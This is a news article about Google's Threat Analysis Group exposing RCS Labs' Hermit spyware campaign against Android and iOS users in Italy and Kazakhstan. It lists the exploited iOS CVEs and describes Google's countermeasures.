Google’s Threat Analysis Group (TAG) caught an Italian spyware vendor RCS Labs targetting Android and iOS users in Italy and Kazakhstan with the help of some ISPs and commercial surveillance tools.
According to the report, TAG believes that ISPs were working with the threat actors in some cases to disable the target’s mobile data connectivity. Once disabled, the attackers moved in with a malicious link pointing to external apps disguised as legitimate carrier apps which would in turn infect the user’s device.
In case the attackers couldn’t directly work with the target’s ISP, they passed off the malicious payload as a messaging app. These apps were being distributed using a made-up support page claiming to help people recover their Facebook, Instagram or Whatsapp accounts that were suspended.
Out of the three, only tapping the Whatsapp link would install a malicious app while the other two redirected to the official app pages. Google says the malicious apps downloaded by targets aren’t present on the Apple App Store or the Google Play Store.
The iOS app used in the attack had several built-in exploits to escalate privileges on infected devices and steal data. Overall, TAG found the following vulnerabilities being exploited.
- CVE-2018-4344: internally referred to and publicly known as LightSpeed.
- CVE-2019-8605: internally referred to as SockPort2 and publicly known as SockPuppet
- CVE-2020-3837: internally referred to and publicly known as TimeWaste.
- CVE-2020-9907: internally referred to as AveCesare.
- CVE-2021-30883: internally referred to as Clicked2, marked as being exploited in the wild by Apple in October 2021.
- CVE-2021-30983: internally referred to as Clicked3 the flaw was patched by Apple in December 2021.
The last two. namely CVE-2021-30883 and CVE-2021-30983 are believed to be zero-day exploits at the time of discovery.
As for the Android payload, while the app didn’t have any exploits bundled in the APK, it did have the capability to download and execute additional modules using the DexClassLoader API.
The Android spyware, named Hermit, has been termed a “modular surveillanceware” that hides its capabilities in external packages which are downloaded after it has been deployed. A detailed analysis of the spyware has been published by cybersecurity firm Lookout.
Google says it has informed impacted Android users of the spyware, implemented changes in Google Play Protect and disabled all Firebase projects being used as command and control centres in this campaign.